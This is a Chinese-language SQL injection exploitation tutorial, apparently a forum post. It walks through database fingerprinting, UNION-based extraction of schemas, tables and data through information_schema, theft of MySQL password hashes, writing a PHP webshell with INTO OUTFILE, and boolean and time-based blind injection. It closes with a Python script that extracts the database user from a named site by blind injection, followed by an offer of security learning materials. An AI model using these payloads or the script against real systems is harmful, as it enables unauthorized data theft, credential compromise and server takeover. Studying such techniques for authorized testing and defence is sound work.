前言

找到 SQL 注入漏洞后，我们可以用它来干什么呢?那么本篇文章给大家带来的就是 SQL 注入漏洞利用技术，现在是时候让我们去体验一下漏洞利用的乐趣了。

第三节 利用 SQL 注入

3.1、识别数据库

要想发动 sql 注入攻击，就要知道正在使用的系统数据库，不然就没法提取重要的数据。

首先从 Web 应用技术上就给我们提供了判断的线索：ASP 和.NET：Microsoft SQL ServerPHP：MySQL、PostgreSQLJava：Oracle、MySQL

Web 容器也给我们提供了线索，比如安装 IIS 作为服务器平台，后台数据及很有可能是 Microsoft SQL Server，而允许 Apache 和 PHP 的 Linux 服务器就很有可能使用开源的数据库，比如 MySQL 和 PostgreSQL。

基于错误识别数据库

大多数情况下，要了解后台是什么数据库，只需要看一条详细的错误信息即可。比如判断我们事例中使用的数据库，我们加个单引号。[SQL]

error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

从错误信息中，我们就可以发现是 MySQL。[SQL]

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1:

上面错误信息可以发现是 Microsoft SQL Server，如果错误信息开头是 ORA，就可以判断数据库是 Oracle，很简单，道理都是一样的，就不一一列举了。

基于数字函数推断

这里以我们搭建的环境为例来做推断：

connection_id()不管它值多少，基本上都是正的，也就是为真，last_insert_id()用法大家自行百度，这里不存在 insert 语句，默认情况就是返回零，也就是假。

那么如果 and connection_id()数据返回正常，and last_insert_id()不返回数据，我们就可以推断这是一个 MySQL 数据库了。

3.2、UINON 语句提取数据

UNION 操作符可以合并两条或多条 SELECT 语句的查询结果，基本语法如下：[SQL]

select column-1 column-2 from table-1UNIONselect column-1 column-2 from table-2

如果应用程序返回了第一条查询得到的数据，我们就可以在第一条查询后面注入一个 UNION 运算符来添加一个任意查询，来提取数据，是不是很容易啊，当然在使用 UNION 之前我们必须要满足

两个条件：

• 两个查询返回的列数必须相同

• 两个查询语句对于列返回的数据类型必须相同

首先我来看第一个条件，如何知道第一条查询的列数呢？我们可以使用 NULL 来尝试，由于 NULL 值会被转换成任何数据类型，所以我们不用管第二个条件。

就是这样的一个个加上去进行尝试，直到不返回错误。

神奇的 ORDER BY 子句

除了上述方法，我们还可以是用 order by 子句得到准确列数

我们先尝试了 12，返回错误，说明列数是小于 12 的，我们继续尝试了 6，返回错误，同理，列数小于 6 的，我们尝试 3，返回正常，说明列数是大于等于 3 的，继续尝试 4，返回错误。说明列数是小于 4，列数大于等于 3，小于 4，可以得到列数是 3。使用 order by 子句可以帮助我们快速得到列数。

得到列数后我们还需要满足第二个条件

很简单，只要一次一列使用我们的测试字符串替换 NULL 即可，可以发现第一列和第二列都可以存放字符串，第三列数据没有输出。

接下来就让我们提取数据库用户名和版本号：

3.3、枚举数据库

这里由于篇幅问题，我们只以 MySQL 数据库为例了，枚举数据库并提取数据遵循一种层次化的方法，首先我们提取数据库名称，然后提取表，再到列，最后才是数据本身。要想获取远程数据库的表、列，就要访问专门保存描述各种数据库结构的表。通常将这些结构描述信息成为元数据。在 MySQL 中，这些表都保存在 information_schema 数据库中

第一步：提取数据库在 MySQL 中，数据库名存放在 information_schema 数据库下 schemata 表 schema_name 字段中[SQL]

id=1 union select null,schema_name,null from information_schema.schemata

第二步：提取表名在 MySQL 中，表名存放在 information_schema 数据库下 tables 表 table_name 字段中

[SQL] 纯文本查看 复制代码

?id=1 union select null,table_name,null from information_schema.tables where table_schema='ichunqiu'

这里我使用 where 子句来筛选了，只返回数据库 ichunqiu 下的表名，想返回所有表名，去掉 where 子句就行了。

第三步：提取字段名在 MySQL 中，字段名存放在 information_schema 数据库下 columns 表 column_name 字段中同样加上 where 子句限制，不让你都不知道字段名是哪个数据库哪个表下。

第四步：提取数据这一步就简单了，不再介绍了，看图。

3.4、窃取哈希可令

MySQL 在 mysql.user 表中存储哈希口令，怎么提取看下图：

哈希口令是通过使用 PASSWORD()函数计算的：

具体算法取决于 MySQL 安装的版本。

3.5、获取 WebShell

利用 SQL 注入攻击获取 WebShell 其实就是在向服务器写文件。（注意：这里我们需要得到网站的绝对路径）所有常用的关系数据库管理系统（RDBMS）均包含内置的向服务器文件系统写文件的功能。[SQL]

select into outfile(dumpfile)  //MySQL写文件命令

例如：[SQL]

select "<?php echo 'test'; ?>" into outfile "F:\\www\\test.php";

那么其它关系数据库管理系统同样的原理写文件，就不在过多介绍了。

第四节 SQL 盲注利用

4.1、初识 SQL 盲注

SQL 盲注是指在无法使用详细数据库错误消息或带内数据连接的情况下，利用数据库查询的输入审查漏洞从数据库提取信息或提取与数据库查询相关信息的技术。

常见的 SQL 盲注入场景：

1、提交一个导致 SQL 查询无效时，会返回一个通用错误页面，提交正确则会返回一个内容可被适度控制的页面。

2、提交一个导致 SQL 查询无效时，会返回一个通用错误页面，提交正确则会返回一个内容不可控的页面。

3、提交受损或不正确的 SQL 既不会产生错误页面，也不会以任何方式影响页面输出。

4.2、SQL 盲注入技术-基于布尔

了解完 SQL 定义以及这类漏洞的注入场景后，现在我带大家深入研究利用这些漏洞的技术。

首先我们我们提交错误的 SQL，看资源是否返回通用的错误页面。

我们能控制页面的输出结果吗？

显然可以[SQL]

id=1 and 1=1 Trueid=1 and 1=2 False

怎么利用？

在介绍利用技巧之前我们先来介绍一个重要的 SQL 函数

[SQL] 纯文本查看 复制代码

SUBSTRING(str,pos,len)

没有 len 参数的形式返回一个字符串从字符串 str 从位置 pos 开始。一个 len 参数的形式返回 len 个字符长的字符串 str 的子串，从位置 pos 开始，形式使用的是标准的 SQL 语法。另外，也可以使用负的值为 pos。在这种情况下，刚开始的子串位置的字符结尾的字符串，而不是开始。负的值可用于为 pos 在此函数中的任何形式的。

举例利用-获取数据的用户名

[SQL]

id=1 and SUBSTRING(user(),1,1)='a'#利用SUBSTRING()函数提取用户名的第一个字符，看等于字符a吗？，如果等于页面返回True状态，不等于返回False状态。

[SQL]

id=1 and SUBSTRING(user(),1,1)='r'#返回True状态，也就是页面正常，表示用户名第一个字符是r

这也就是基于布尔的 SQL 盲注入技术

4.3、SQL 盲注入技术-基于时间

和基于布尔的 SQL 盲注入技术原理其实大同小异，当某一状态为真时，让响应暂停几秒钟，而当状态为假时，不出现暂停。

废话不多说看技巧利用。

[SQL]

id=1 union select if(SUBSTRING(user(),1,4)='root',sleep(4),1),null,null#注意使用union的条件哦，前面介绍了。同样的道理，提取用户名前四个字符做判断，正确就延迟4秒，错误返回1

4.4、我们的好朋友-Python

使用 Python 自动化注入获取用户名事例：

MySQL 提取用户名进行比较不区分大小写，所以我们去掉其中的大写字母。代码很简单，就不解释了。[Python]

import requests def attack():    print 'launch an attack'    url = 'http://www.isbase.com/sqlbool.php'    user = '[+]system_user: '    zimu1 = range(33,65)    zimu2 = range(91,128)    zimu = zimu1 + zimu2    for l in range(1,16):        for i in zimu:            payload = "and SUBSTRING(user(),"+str(l)+",1)='" + chr(i) + "'"            payload = {'id': '1 ' + payload}            r = requests.get(url, params=payload)            wenben = r.text            wenben = wenben.encode("utf-8")            result = wenben.find("jim")            if(result != -1):                user = user + chr(i)                print user if __name__ == '__main__':    print 'Author:zusheng'    print 'bbs:ichunqiu.com'    attack()    print '[+]ok'

结束语

感谢大家的支持，写的自己感觉很满意了，但是并不是很完美，希望以后能给大家带来更多精华的文章吧。还有最后一篇高级部分。坚持吧，努力给大家带来更详细更深入的好文。技术有限，如文中有错误请指出，谢谢。

感谢大家的支持吧，在此我也总结一下前面自己的不足，由于篇幅很长，宽度是到位了，但是并没有深入，也不算详细，所以本篇教程分为了三级来写，既要深度也要宽度，当然我也不是技术大牛，如文中有错误请指出，我会加以改正。

最后，为了感谢读者们，我想把我收藏的一些网络安全/渗透测试学习干货贡献给大家，回馈每一个读者，希望能帮到你们。

干货主要有：

①2000 多本网安必看电子书（主流和经典的书籍应该都有了）

②PHP 标准库资料（最全中文版）

③项目源码（四五十个有趣且经典的练手项目及源码）

④ 网络安全基础入门、Linux 运维，web 安全、渗透测试方面的视频（适合小白学习）

⑤ 网络安全学习路线图（告别不入流的学习）

⑥ 渗透测试工具大全

⑦ 2021 网络安全/Web 安全/渗透测试工程师面试手册大全

【资料领取】